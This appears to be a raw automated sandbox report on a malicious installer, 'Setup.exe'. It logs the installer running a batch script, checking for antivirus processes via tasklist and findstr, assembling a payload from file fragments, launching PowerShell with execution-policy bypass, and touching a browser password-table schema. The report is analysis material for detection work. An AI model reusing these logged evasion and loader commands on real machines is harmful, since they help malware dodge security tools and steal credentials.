            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3136:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
            Source: C:\Users\user\Desktop\'Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsp39E5.tmpJump to behavior
            Source: 'Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
            Source: C:\Users\user\Desktop\'Setup.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Contrast.com, 0000000A.00000003.2546320698.00000000045A2000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2503827669.000000000456C000.00000004.00000800.00020000.00000000.sdmp, Contrast.com, 0000000A.00000003.2503593210.0000000004596000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: 'Setup.exeReversingLabs: Detection: 13%
            Source: C:\Users\user\Desktop\'Setup.exeFile read: C:\Users\user\Desktop\'Setup.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\'Setup.exe "C:\Users\user\Desktop\'Setup.exe"
            Source: C:\Users\user\Desktop\'Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 108941
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor A
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Contrast.com A
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\5TM3JMZQCYKEYRKL75T8.ps1"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\'Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Hazard Hazard.cmd && Hazard.cmdJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 108941Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Lines + ..\Edmonton + ..\Characterization + ..\Tampa + ..\Poet + ..\Artwork + ..\Butts + ..\Harbor AJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\108941\Contrast.com Contrast.com AJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\VKLM5S46YTD8XS7X69X8S6283E.ps1"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\5TM3JMZQCYKEYRKL75T8.ps1"Jump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\'Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: 'Setup.exeStatic file information: File size 1076464 > 1048576
            Source: 'Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbw source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2880384967.00000000075F3000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb% source: powershell.exe, 00000011.00000002.2866405600.0000000002FC7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2866405600.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\'Setup.exeCode function: 0_2_00406328 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406328
            Source: 'Setup.exeStatic PE information: real checksum: 0x10d97b should be: 0x10cb2c
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_00538B75 push ecx; ret 10_2_00538B88
            Source: C:\Users\user\AppData\Local\Temp\108941\Contrast.comCode function: 10_2_0052CBF1 push eax; retf 10_2_0052CBF8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_04105DD0 push esp; ret 14_2_04105DE3
